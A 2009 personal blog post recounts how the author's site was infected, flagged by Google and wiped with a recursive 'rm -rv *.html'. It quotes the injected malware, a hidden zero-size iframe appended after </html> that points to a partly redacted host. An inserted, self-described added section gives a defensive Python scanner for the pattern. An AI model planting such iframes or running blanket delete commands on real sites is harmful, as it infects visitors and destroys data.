
Google cares, but only so much...

Google has no problems with adding a warning to your website, like this:

However, when coming to do something about it, Google has many potential problems:

  • I am not going to complain about having to log in to Google's webmaster tools, create an account, and upload a special HTML file to the site. Google is a machine, and it has to know you are who you say you are. Now for the remainder of the discussion, remember that you HAVE created yourself an account within Google...
  • The report that you can read only provides a small subset example:
  • When you log in as a webmaster, Google will provide an example listing of affected pages. It lists 25 pages. But there's a bug in Google - Ewen deleted those pages listed and asked for it to scan HeyRick again, and it reported malware (obviously) and provided the same list of example pages. Looking for those pages in the browser reported 404. They were truly gone.

Now given the small numbers, we thought we could get on top of this problem. Google's webmaster tools turned out to be rather useless - it should have a way to access a listing of all pages it thinks are 'damaged', along with a brief reason why - even if in code form that you have to look up.

Why do I say this? We spent a week knowing the site had been compromised looking for ways to hunt down the offending pages. I fired up Minix3 in a virtual PC and swotted up on grep...

...but it wasn't until Ewen had a brainwave that the actual nature of the problem became clear.

Ewen decided to download a copy of the entire site, and to see how many warnings his antivirus threw up. Now I have no idea of how many actual pages are on my site - it is spread across three computers. The 'active' part of my site amounts to a little over 900 pages. I would guess about another hundred or so (?) on the RiscPC.

Ewen told me over 500 pages were infected.

 

Bye-bye HeyRick

I told Ewen to log in to the server and issue "rm -rv *.html" (and likewise for *.css and *.js).

If Google had revealed the true nature of the problem, we'd have taken the heavy-handed route earlier.

For those of you who don't know Unix commands - that is an instruction to recursively delete all of the HTML files on HeyRick. Every single web page - gone! The graphics, archives, and such will remain, but all the pages will be erased. If there is anything on the site that is not a part of the offline copies, it will be lost forever. Too bad.

There's a part of me that wants to think "oh well, that's what you get for using crap software", but there's a bigger part of me that has some modicum of responsibility. So users might be clueless and using insecure software. An awful lot of people don't have a clue when it comes to security. I know some people that heard a warning about computer viruses on TV and went out and bought an anti-spyware package from two years ago as it was on a special offer. I offered to install AVG, but as they were on dial-up they declined (consider how long many megabytes would take to download at 56kbps) and now use a computer on the internet with no antivirus whatsoever. Thankfully there is little important information on that machine, but that doesn't mean it's immune, or even remotely safe. I very much doubt they are alone.

So as a responsible netizen, it is my duty to do what I can to provide a safer web experience. Some people may have issue over parts of my site (especially if they subscribe to the 'creationalist' theory), but this is a problem of freedom of thought. Things I say may compromise your beliefs (or vice versa? email me!), but there should be nothing on a website that will compromise your computer.

You will notice that I have a pretty lax attitude to tracking visitors. Some stuff (like Frobnicate) indirected to a php script to log how many downloads it gets so I can track popularity. Some stuff might ask for your email address if it is restricted release software. But for 99.9% of this site, I don't care who visits or how often. Cookies are not used. My own privacy policy warns you against accessing the site via frames or other wrappings unless as an automatic translation you yourself have requested. I don't need to know who you are, why should anybody else track you?
So you can guess how I felt seeing the "malware" flag applied to my site...

Staying in that situation, the risk of doing bad things to the computers of my visitors was too great. So I issued Ewen with the takedown order. It's all gone.

 

Argh! 404s!

Sometimes bad luck just keeps on coming. I went to the library on Saturday to pass a 12Mb TAR to Ewen to restore parts of the site after it was wiped off, and found that the server was throwing a wobbly. Located in the (locked) mayor's building, it couldn't be reset and it was refusing connection to everything. So I SMS'd Ewen to take it all off. Putting it back we can do in our own time. Taking it off is a priority. And it'd have been done a week earlier if Google had provided a genuine clue as to the scale of the damage.

 

Recovery

As you are reading this, some parts of HeyRick have been restored. What you will have access to is the 'live' part of my site residing on Aiko's harddisc. I don't think it will be until I get the eeePC that I will attempt to reconstruct a complete copy of my site on an SD card. The reason it was split is the old laptop I used to use only had a 6Gb harddisc and I didn't feel able to justify space on the disc for a complete copy of the site for stuff that I'd not be working on any more - like Argonet Voyager utilities...

What you see is likely to be all that will be available until I get ADSL at home. Ewen has been doing some sterling work getting this mess sorted out, but I can't ask him to walk through every single page looking for broken links and missing content. That's something I will need to do myself.

If there is something missing that you would like made available - email me - I will take requests!

 

92.38.0.0

It is really useful to know that http://www.ip-db.com/ exists. It made it effortless to track down that IP address which is, I believe, the site hosting the malware itself.

The IP address is located here in the region Hlavni mesto Praha (i.e. Prague) in the Czech Republic, and it was allocated on 2008/02/01. The BGP routing information is via "AS48974" registered to Masterforex Ltd. This may be the spoof "m-analytics"?

 

What actually was the infection code?

Appended to the bottom of various pages, after the closing </html> tag, was this:

    <iframe src="http://m-an<omitted>tics.net/arwe/?<hex string>" width=0 height=0
    style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

I could point out a number of security flaws that lead to this working - parsing beyond the closing HTML tag, actually being stupid enough to obey a zero-size and hidden IFrame... A browser that obeyed that link ought to be condemned. But that doesn't help the end user...
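
A scanner for the pattern described above, checking a downloaded copy of a site for both markers the post names: content after the closing </html> tag, and a zero-size or hidden iframe. This is an added example, not code from the original post; the function names, the `example.invalid` host and the two sample pages are constructed for illustration.

```python
import re
from pathlib import Path

# Anything after the last closing </html> tag is suspect: legitimate pages end there.
HTML_CLOSE = re.compile(r"</html\s*>", re.IGNORECASE)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR = re.compile(r"""([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")

def iframe_attrs(tag):
    """Return the tag's attributes as a dict (lower-cased names, quotes stripped)."""
    return {k.lower(): v.strip("\"'") for k, v in ATTR.findall(tag)}

def is_invisible(attrs):
    """Zero width/height or a hiding style, as in the injected tag."""
    zero = any(attrs.get(k, "").lower() in ("0", "0px") for k in ("width", "height"))
    style = attrs.get("style", "").lower().replace(" ", "")
    return zero or "hidden" in style or "display:none" in style

def scan_html(text):
    """Return a list of (reason, detail) findings for one page."""
    findings = []
    closes = list(HTML_CLOSE.finditer(text))
    if closes:
        trailer = text[closes[-1].end():].strip()
        if trailer:  # whitespace after </html> is normal, markup is not
            findings.append(("content-after-html-close", trailer[:80]))
    for m in IFRAME.finditer(text):
        attrs = iframe_attrs(m.group(0))
        if is_invisible(attrs):
            findings.append(("invisible-iframe", attrs.get("src", "")))
    return findings

def scan_tree(root, patterns=("*.html", "*.htm")):
    """Scan every page under root; return {path: findings} for flagged pages only."""
    report = {}
    for pattern in patterns:
        for path in Path(root).rglob(pattern):
            hits = scan_html(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

# Constructed samples: a clean page, and one with a trailer shaped like the injection.
CLEAN = "<html><body><p>Hello</p></body></html>\n"
INFECTED = CLEAN + ('<iframe src="http://malware.example.invalid/x/?deadbeef" width=0 '
                    'height=0 style="hidden" frameborder=0></iframe>')

if __name__ == "__main__":
    print(scan_html(CLEAN), scan_html(INFECTED))
```

Running `scan_tree` over a local mirror gives the full list of flagged pages with a reason for each, which is the listing the webmaster tools did not provide.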

On the plus side, I was by no means alone - read http://www.theregister.co.uk/2009/05/30/mass_web_infection/.
Please pay careful attention to the links to related stories at the bottom of that page. Infections hitting servers, numbers in tens of thousands. It doesn't bode well for on-line security, and if you are one of the people who are browsing the web and your computer isn't locked up tighter than a nun's panties, you might be well advised to make shoring up your defences the number one priority above everything else.

 

Holy Mary mother of God...!

I heard this expression uttered by the news presenter at the end of The Goonies when that old boat comes in to view. It's a bit bogus as an expression as, wasn't Mary the mother of Jesus, and God sort-of doesn't have a mother? You could argue for ages over if God is the creator, who created God... but I digress - for as bizarre as the expression may seem, it sounds good when looking at:

You might be thinking, oooh, 35.1°, that's not so hot. Well, it is for around here! It's our current hottest. Well, no, I lie. In the time it took to process this picture, it has risen a tenth of a degree - to 35.2°C! The forecast? 29°C!

The time on the device is from radio-sync. The camera is running a little fast. I'll fix that now...

 


© 2009 Rick Murray
This web page is licenced for your personal, private, non-commercial use only. No automated processing by advertising systems is permitted.
RIPA notice: No consent is given for interception of page transmission.

 
